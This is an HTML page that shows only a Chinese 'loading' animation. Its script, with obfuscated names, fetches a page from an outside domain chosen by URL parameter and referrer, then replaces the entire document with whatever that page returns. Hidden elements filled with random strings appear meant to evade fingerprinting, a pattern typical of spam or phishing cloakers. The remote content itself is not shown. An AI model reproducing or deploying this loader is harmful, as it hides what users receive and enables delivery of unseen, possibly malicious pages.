<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .HibBpUp {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .HibBpUp .Q2LpUoYpPu3 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .HibBpUp .content {
            line-height: 50px;
            text-align: center
        }

        .HibBpUp .img {
            width: 100%
        }

        .HibBpUp .T7jxVdlh {
            text-align: center
        }

        .HibBpUp .T7jxVdlh span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .HibBpUp .T7jxVdlh span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .HibBpUp .T7jxVdlh span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .HibBpUp .T7jxVdlh span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .HibBpUp .T7jxVdlh span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .HibBpUp .T7jxVdlh span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .HibBpUp .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function mFOdjgAxxj(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var KJlmBu = mFOdjgAxxj('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ KJlmBu +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ KJlmBu +".html?a=share";
		}
		
        ZefFUcTg=url+"#"+new Date().getTime();
        ZefFUcTg && function() {
            $.get(ZefFUcTg, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>lvYeakWcE2Dl</a>
<p  style='display:none'>wJ3OHAgngwCAnH3lgcZvjHefZvZgWfz3875Yd5DW00A5rogZnNLVOMnOZjWflrt</p>
<div style='display:none'>rrnP0XLZPw0T0y8q83YR53ludBSPAtQIYZeNO9MeqPh5XlL94VSdojlhi</div>
<span style='display:none'>wItkrm1oJV06WSTPI9vT4JVOmhYAdg3tqy13dBD0YKZWxS88q7stDYmmfumZlF9l</span>
<a  href='#' style='display:none'>lvYeakWcE2Dl</a>
<img  src='' style='display:none'>
<p  style='display:none'>wJ3OHAgngwCAnH3lgcZvjHefZvZgWfz3875Yd5DW00A5rogZnNLVOMnOZjWflrt</p>
<span style='display:none'>wItkrm1oJV06WSTPI9vT4JVOmhYAdg3tqy13dBD0YKZWxS88q7stDYmmfumZlF9l</span>
<div style='display:none'>rrnP0XLZPw0T0y8q83YR53ludBSPAtQIYZeNO9MeqPh5XlL94VSdojlhi</div><div class="HibBpUp">
    <div class="Q2LpUoYpPu3">
        <div class="T7jxVdlh">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >UWQPphPVNxWMoKM8JehukTlnvbXVGdCD61aCeaLlZYFPYR1Keb1pCqrnXIBVbSzPikS1Cl3Ts2tkT4Zoqte80BidAukLlW1</h1>
<p  style='display:none'>ymYwxLjW9HsddSzkFiUr6FhbhUuU1un6tVxTND4hMLPSg5pUOP8pbjTRElOLbOBOCiELqqJm3A0Z</p>
<b style='display:none' >wG2UApfcz1Z2XBA1MmojDCYI44WtBfuudY9UxsuYe1O7FUsHXWLGtse4je12lVrhxNRzLjxGeMof1TH8JZbmDb0SdZCe2El0</b>
<b style='display:none' >wG2UApfcz1Z2XBA1MmojDCYI44WtBfuudY9UxsuYe1O7FUsHXWLGtse4je12lVrhxNRzLjxGeMof1TH8JZbmDb0SdZCe2El0</b></body>
</html>